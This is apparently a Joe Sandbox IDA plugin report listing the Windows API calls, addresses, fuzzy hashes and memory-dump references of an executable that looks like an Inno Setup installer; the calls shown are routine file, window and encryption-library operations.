                                                                                        • Opcode ID: e41b2ce6836bec360355d7b24c2a1717b910cfd1a437749fc580c6f152555136
                                                                                        • Instruction ID: 23182b732e3c774e917f784577cc733395bd6f0e504c2650860deaf78f25ff04
                                                                                        • Opcode Fuzzy Hash: e41b2ce6836bec360355d7b24c2a1717b910cfd1a437749fc580c6f152555136
                                                                                        • Instruction Fuzzy Hash: CBF0C870294B41B9EA10A6718C17F3B21C89B40709F80083ABD05E90D3D7BDD40C4A2E
                                                                                        APIs
                                                                                        • GetProcAddress.KERNEL32(10000000,ISCryptGetVersion), ref: 0045D191
                                                                                        • GetProcAddress.KERNEL32(10000000,ArcFourInit), ref: 0045D1A1
                                                                                        • GetProcAddress.KERNEL32(10000000,ArcFourCrypt), ref: 0045D1B1
                                                                                        • ISCryptGetVersion._ISCRYPT(10000000,ArcFourCrypt,10000000,ArcFourInit,10000000,ISCryptGetVersion,?,0047F96F,00000000,0047F998), ref: 0045D1D6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$CryptVersion
                                                                                        • String ID: ArcFourCrypt$ArcFourInit$ISCryptGetVersion
                                                                                        • API String ID: 1951258720-508647305
                                                                                        • Opcode ID: dc81785b55ac876962535e0a2eb36b1dd730d24c9132c457d47d12d4ae2e21c2
                                                                                        • Instruction ID: d394b6b565b4a55a8c16e24b867b534ad65140704dc94b035c924c7661ebf9a3
                                                                                        • Opcode Fuzzy Hash: dc81785b55ac876962535e0a2eb36b1dd730d24c9132c457d47d12d4ae2e21c2
                                                                                        • Instruction Fuzzy Hash: A2F030B0D41700CAD318EFF6AC957263B96EB9830AF14C03BA414C51A2D7794454DF2C
                                                                                        APIs
                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,004981E2,?,?,00000000,0049B628,?,0049836C,00000000,004983C0,?,?,00000000,0049B628), ref: 004980FB
                                                                                        • SetFileAttributesA.KERNEL32(00000000,00000010), ref: 0049817E
                                                                                        • FindNextFileA.KERNEL32(000000FF,?,00000000,004981BA,?,00000000,?,00000000,004981E2,?,?,00000000,0049B628,?,0049836C,00000000), ref: 00498196
                                                                                        • FindClose.KERNEL32(000000FF,004981C1,004981BA,?,00000000,?,00000000,004981E2,?,?,00000000,0049B628,?,0049836C,00000000,004983C0), ref: 004981B4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFind$AttributesCloseFirstNext
                                                                                        • String ID: isRS-$isRS-???.tmp
                                                                                        • API String ID: 134685335-3422211394
                                                                                        • Opcode ID: 4cf053d52b7de9e99314ef9443aa0be7ff49bfb1b7c6e14e5d4b85c56af708b1
                                                                                        • Instruction ID: fc6fb5a4e2302b333323d0d019d05182e8323e6fc1a1653111c694b95695a562
                                                                                        • Opcode Fuzzy Hash: 4cf053d52b7de9e99314ef9443aa0be7ff49bfb1b7c6e14e5d4b85c56af708b1
                                                                                        • Instruction Fuzzy Hash: E1316A719016186FCF10EF69CC42ADEBBBCDB45314F5044BBA808E3291DA3C9F458E58
                                                                                        APIs
                                                                                        • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457611
                                                                                        • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457638
                                                                                        • SetForegroundWindow.USER32(?), ref: 00457649
                                                                                        • NtdllDefWindowProc_A.USER32(00000000,?,?,?,00000000,00457921,?,00000000,0045795D), ref: 0045790C
                                                                                        Strings
                                                                                        • Cannot evaluate variable because [Code] isn't running yet, xrefs: 0045778C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePostWindow$ForegroundNtdllProc_
                                                                                        • String ID: Cannot evaluate variable because [Code] isn't running yet
                                                                                        • API String ID: 2236967946-3182603685
                                                                                        • Opcode ID: 74e42c9c2b67fd5adc195c0662b506aaf6a0f02139eddaf5114ff9c1448628c8
                                                                                        • Instruction ID: 8776962154e21e4b1c8854f5ca4bcfaa90dd950cda3ad59ac2e2fede597431d6
                                                                                        • Opcode Fuzzy Hash: 74e42c9c2b67fd5adc195c0662b506aaf6a0f02139eddaf5114ff9c1448628c8
                                                                                        • Instruction Fuzzy Hash: 2B91D334608204DFEB15CF55E991F5ABBF5EB89704F2184BAE80497792C638AE04DB68
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA,00000000,00455F4B), ref: 00455E3C
                                                                                        • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00455E42
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProc
                                                                                        • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                        • API String ID: 1646373207-3712701948
                                                                                        • Opcode ID: 409835b603e199d4170178d82c1615a1651ba94ec2cafac24c158ef3a131e909
                                                                                        • Instruction ID: d81c9a8c7c52065d28d66f53e81ce4f313aa74f068c2efe820cb9bfc493487ae
                                                                                        • Opcode Fuzzy Hash: 409835b603e199d4170178d82c1615a1651ba94ec2cafac24c158ef3a131e909
                                                                                        • Instruction Fuzzy Hash: B0418671A04649AFCF01EFA5C8929EEB7B8EF48305F504567F804F7292D67C5E098B68
                                                                                        APIs
                                                                                        • IsIconic.USER32(?), ref: 00417D0F
                                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D2D
                                                                                        • GetWindowPlacement.USER32(?,0000002C), ref: 00417D63
                                                                                        • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D8A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Placement$Iconic
                                                                                        • String ID: ,
                                                                                        • API String ID: 568898626-3772416878
                                                                                        • Opcode ID: b31359e3e3f4af84bc1879df8bb30ee95a40fb82c66b770674b351632ff57231
                                                                                        • Instruction ID: e85585575f8c5a3e7823c55acc6b28d6d187d41511fbfc80546af44b70413e2d
                                                                                        • Opcode Fuzzy Hash: b31359e3e3f4af84bc1879df8bb30ee95a40fb82c66b770674b351632ff57231
                                                                                        • Instruction Fuzzy Hash: 4C2112716042089BDF10EF69D8C1AEA77B8AF48314F05456AFD18DF346D678DD84CBA8
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(00000001,00000000,0046433F), ref: 004641CD
                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,0046430A,?,00000001,00000000,0046433F), ref: 00464213
                                                                                        • FindNextFileA.KERNEL32(000000FF,?,00000000,004642EC,?,00000000,?,00000000,0046430A,?,00000001,00000000,0046433F), ref: 004642C8
                                                                                        • FindClose.KERNEL32(000000FF,004642F3,004642EC,?,00000000,?,00000000,0046430A,?,00000001,00000000,0046433F), ref: 004642E6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$File$CloseErrorFirstModeNext
                                                                                        • String ID:
                                                                                        • API String ID: 4011626565-0
                                                                                        • Opcode ID: 1efd1e5842b6513eb7f92915edfbe8fc84401e145746a4d83abe9154eb57289a
                                                                                        • Instruction ID: 9d9184480f8630aada0b530c6bd54f2fc26159d28d851f3c8c43bf9f92f270d6
                                                                                        • Opcode Fuzzy Hash: 1efd1e5842b6513eb7f92915edfbe8fc84401e145746a4d83abe9154eb57289a
                                                                                        • Instruction Fuzzy Hash: 77418370A00A18DBCF10EFA5DC959DEB7B8EB88305F5044AAF804A7341E7789E448E59
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(00000001,00000000,00463E99), ref: 00463D0D
                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,00463E6C,?,00000001,00000000,00463E99), ref: 00463D9C
                                                                                        • FindNextFileA.KERNEL32(000000FF,?,00000000,00463E4E,?,00000000,?,00000000,00463E6C,?,00000001,00000000,00463E99), ref: 00463E2E
                                                                                        • FindClose.KERNEL32(000000FF,00463E55,00463E4E,?,00000000,?,00000000,00463E6C,?,00000001,00000000,00463E99), ref: 00463E48
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$File$CloseErrorFirstModeNext
                                                                                        • String ID:
                                                                                        • API String ID: 4011626565-0
                                                                                        • Opcode ID: 7f0cfbd2c28eb096c2c7b79ad6d01cc7699265dce8ba217153498c446e9855ae
                                                                                        • Instruction ID: 85e7d80bc36d7b3e80fea797042c039a90a2821ca6a16b1e557570abf42aa49f
                                                                                        • Opcode Fuzzy Hash: 7f0cfbd2c28eb096c2c7b79ad6d01cc7699265dce8ba217153498c446e9855ae
                                                                                        • Instruction Fuzzy Hash: 3A41B770A00A589FCB11EF65CC45ADEB7B8EB88705F4044BAF404A7381E67D9F48CE59
                                                                                        APIs
                                                                                        • CreateFileA.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E956
                                                                                        • DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000), ref: 0042E981
                                                                                        • GetLastError.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E98E
                                                                                        • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E996
                                                                                        • SetLastError.KERNEL32(00000000,00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E99C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$CloseControlCreateDeviceFileHandle
                                                                                        • String ID:
                                                                                        • API String ID: 1177325624-0
                                                                                        • Opcode ID: 00c40fca2cfdd97ba02e44e9efda7f487b55ec81a2bcf6d63bb4130569f45397
                                                                                        • Instruction ID: 661b18b1de4eb1238568a50ab540e77c3175952f9b14320adb6d96c9b056064d
                                                                                        • Opcode Fuzzy Hash: 00c40fca2cfdd97ba02e44e9efda7f487b55ec81a2bcf6d63bb4130569f45397
                                                                                        • Instruction Fuzzy Hash: 80F090B23A17207AF620B57A5C86F7F418CCB89B68F10423BBA04FF1D1D9A85D0555AD
                                                                                        APIs
                                                                                        • IsIconic.USER32(?), ref: 0048397A
                                                                                        • GetWindowLongA.USER32(00000000,000000F0), ref: 00483998
                                                                                        • ShowWindow.USER32(00000000,00000005,00000000,000000F0,0049C0A8,00482E56,00482E8A,00000000,00482EAA,?,?,?,0049C0A8), ref: 004839BA
                                                                                        • ShowWindow.USER32(00000000,00000000,00000000,000000F0,0049C0A8,00482E56,00482E8A,00000000,00482EAA,?,?,?,0049C0A8), ref: 004839CE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Show$IconicLong
                                                                                        • String ID:
                                                                                        • API String ID: 2754861897-0
                                                                                        • Opcode ID: 388bc32bc28a7c539796bab44a6ba9bad50612e2c7d9e5998850325d2fd9b569
                                                                                        • Instruction ID: 3cea9153c2b451a1fdc95e78a984a36fb28f479a74ffefb17a89e5a976076ef3
                                                                                        • Opcode Fuzzy Hash: 388bc32bc28a7c539796bab44a6ba9bad50612e2c7d9e5998850325d2fd9b569
                                                                                        • Instruction Fuzzy Hash: 160156B0705200ABEA00BF659CCBB5F22C55714745F44093BF4459B292CAADDA859B5C
                                                                                        APIs
                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,00462824), ref: 004627A8
                                                                                        • FindNextFileA.KERNEL32(000000FF,?,00000000,00462804,?,00000000,?,00000000,00462824), ref: 004627E4
                                                                                        • FindClose.KERNEL32(000000FF,0046280B,00462804,?,00000000,?,00000000,00462824), ref: 004627FE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$File$CloseFirstNext
                                                                                        • String ID:
                                                                                        • API String ID: 3541575487-0
                                                                                        • Opcode ID: b12316252c39c0105a03a3a2020ea099ca75c42189d8bae58c1ecd15a925fcd0
                                                                                        • Instruction ID: e6acefadc91213b77ea930f6be1f86c6134c8588622ee3d3acab995ed1c325b6
                                                                                        • Opcode Fuzzy Hash: b12316252c39c0105a03a3a2020ea099ca75c42189d8bae58c1ecd15a925fcd0
                                                                                        • Instruction Fuzzy Hash: 87210831904B08BECB11EB65CC41ACEB7ACDB49304F5084B7E808E32A1F6789E44CE69
                                                                                        APIs
                                                                                        • IsIconic.USER32(?), ref: 004241E4
                                                                                        • SetActiveWindow.USER32(?,?,?,0046CD53), ref: 004241F1
                                                                                          • Part of subcall function 0042364C: ShowWindow.USER32(00410460,00000009,?,00000000,0041EDA4,0042393A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00423667
                                                                                          • Part of subcall function 00423B14: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,021125AC,0042420A,?,?,?,0046CD53), ref: 00423B4F
                                                                                        • SetFocus.USER32(00000000,?,?,?,0046CD53), ref: 0042421E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ActiveFocusIconicShow
                                                                                        • String ID:
                                                                                        • API String ID: 649377781-0
                                                                                        • Opcode ID: 1be179083055f96161d8b165ddd04f1e3bd56871e014c6a07f585ac04199aa1a
                                                                                        • Instruction ID: c953833529836f01456b8f788e47b4b7c36f7a841d6c6df07f57e62630513da6
                                                                                        • Opcode Fuzzy Hash: 1be179083055f96161d8b165ddd04f1e3bd56871e014c6a07f585ac04199aa1a
                                                                                        • Instruction Fuzzy Hash: 8CF030B170012097CB10BFAAA8C5B9676A8AB48344F5500BBBD05DF357CA7CDC018778
                                                                                        APIs
                                                                                        • IsIconic.USER32(?), ref: 00417D0F
                                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D2D
                                                                                        • GetWindowPlacement.USER32(?,0000002C), ref: 00417D63
                                                                                        • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D8A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Placement$Iconic
                                                                                        • String ID:
                                                                                        • API String ID: 568898626-0
                                                                                        • Opcode ID: 19084698f29920acc68274fefc6d1be37826273bcf8ca1bc36e8902df026f6c2
                                                                                        • Instruction ID: d9358ea7cd183770b33139a8ac7b7a0a70302bd2c01e5fc8313c3e2814ac7f2c
                                                                                        • Opcode Fuzzy Hash: 19084698f29920acc68274fefc6d1be37826273bcf8ca1bc36e8902df026f6c2
                                                                                        • Instruction Fuzzy Hash: 33012C71204108ABDB10EE59D8C1EF673A8AF45724F154566FD19DF242D639ED8087A8
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: CaptureIconic
                                                                                        • String ID:
                                                                                        • API String ID: 2277910766-0
                                                                                        • Opcode ID: c22591b8c3f2be6e3e416ff0957708157ed46c57fff49ed7de8fa542590db40d
                                                                                        • Instruction ID: 6cb7601519473143bf4e876ebf6758ccc8fc4fa751d6c6e0357a6193460a6b05
                                                                                        • Opcode Fuzzy Hash: c22591b8c3f2be6e3e416ff0957708157ed46c57fff49ed7de8fa542590db40d
                                                                                        • Instruction Fuzzy Hash: 0AF0A4723056425BD730AB2EC984AB762F69F84314B14403BE419CBFA1EB3CDCC08798
                                                                                        APIs
                                                                                        • IsIconic.USER32(?), ref: 0042419B
                                                                                          • Part of subcall function 00423A84: EnumWindows.USER32(00423A1C), ref: 00423AA8
                                                                                          • Part of subcall function 00423A84: GetWindow.USER32(?,00000003), ref: 00423ABD
                                                                                          • Part of subcall function 00423A84: GetWindowLongA.USER32(?,000000EC), ref: 00423ACC
                                                                                          • Part of subcall function 00423A84: SetWindowPos.USER32(00000000,\AB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241AB,?,?,00423D73), ref: 00423B02
                                                                                        • SetActiveWindow.USER32(?,?,?,00423D73,00000000,0042415C), ref: 004241AF
                                                                                          • Part of subcall function 0042364C: ShowWindow.USER32(00410460,00000009,?,00000000,0041EDA4,0042393A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00423667
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ActiveEnumIconicLongShowWindows
                                                                                        • String ID:
                                                                                        • API String ID: 2671590913-0
                                                                                        • Opcode ID: b2ff140757208bd7b7cc33ac29151dbeb423d1cdddd3b288bc041a56f1810338
                                                                                        • Instruction ID: ce5d4440ec1c13bcfda566247f28ea27228b22b89c70f7a48f218b5e8bc86154
                                                                                        • Opcode Fuzzy Hash: b2ff140757208bd7b7cc33ac29151dbeb423d1cdddd3b288bc041a56f1810338
                                                                                        • Instruction Fuzzy Hash: 55E01AA070011087DB10AFAADCC8B9632A9BB48304F55017ABD49CF35BD63CC8608724
                                                                                        APIs
                                                                                        • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,004127D5), ref: 004127C3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: NtdllProc_Window
                                                                                        • String ID:
                                                                                        • API String ID: 4255912815-0
                                                                                        • Opcode ID: 120c9c179850e2d77f2b5158c289480559fb4752f9becda92d3f5c4f199058c9
